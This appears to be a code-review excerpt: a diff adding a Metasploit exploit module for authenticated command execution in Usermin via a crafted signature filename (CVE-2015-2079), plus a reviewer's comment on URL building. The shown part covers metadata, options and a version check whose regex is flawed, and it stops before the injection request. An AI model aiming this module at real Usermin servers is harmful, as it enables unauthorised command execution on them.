modules/exploits/linux/http/usermin_exec.rb

```diff
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  HttpFingerprint = { :pattern => [ /MiniServ/ ] }
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Usermin 0.980-1.650 Authenticated Arbitrary Command Execution",
+      'Description'    => %q{
+        This modules exploits a vulnerability found in Usermin, version 0.980 up to
+        1.650. As an authenticated user, arbitrary command execution is possible by
+        manipulating the filename of an email signature file and triggering a function
+        to display the signature.
+
+        Payload hint: cmd/unix/*perl* works best because Usermin is based on Perl :-)
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+         [
+           'David Elze < david.elze@code-white.com >' # Discovery & this simple MSF module
+         ],
+       'References'     =>
+         [
+           [ 'CVE', '2015-2079' ],
+           [ 'URL', 'http://codewhitesec.blogspot.de/2015/05/cve-2015-2079-rce-usermin.html'],
+         ],
+      'Arch'           => ARCH_CMD,
+      'Platform'       => ['unix'],
+      'BadChars' => "",
+      'Compat'         =>
+        {
+          'PayloadType' => 'cmd',
+          'RequiredCmd' => 'generic perl bash'
+        },
+      'Targets'        =>
+        [
+          ['Usermin 0.980-1.650 on Linux', {}],
+        ],
+      'DisclosureDate' => "Feb 23 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(20000),
+          OptBool.new('SSL', [true, 'Use SSL', true]),
+          OptString.new('USERNAME', [ true, 'Usermin username', '']),
+          OptString.new('PASSWORD', [ true, 'Usermin password', '']),
+          OptString.new('TARGETURI', [true, 'The URI path to Usermin', '/'])
+        ], self.class)
+  end
+
+  def check
+    http_handler = ((datastore['SSL']) ? "https" : "http")
+    uri = normalize_uri(target_uri.path)
+    uri << '/' if uri[-1, 1] != '/'
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "#{uri}"
+    })
+
+    if res and res.body =~ /Usermin [0.980-1.650]/
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    http_handler = ((datastore['SSL']) ? "https" : "http")
+    uri = target_uri.path
+    url = "#{http_handler}://#{rhost}:#{rport}#{uri}"
```

Comment:
Yes. Only for referrer. The above statement is generating the actual request by constructing the URL parts manually so this needs to be changed. Only the uri variable is enough to generate request through send_request_*.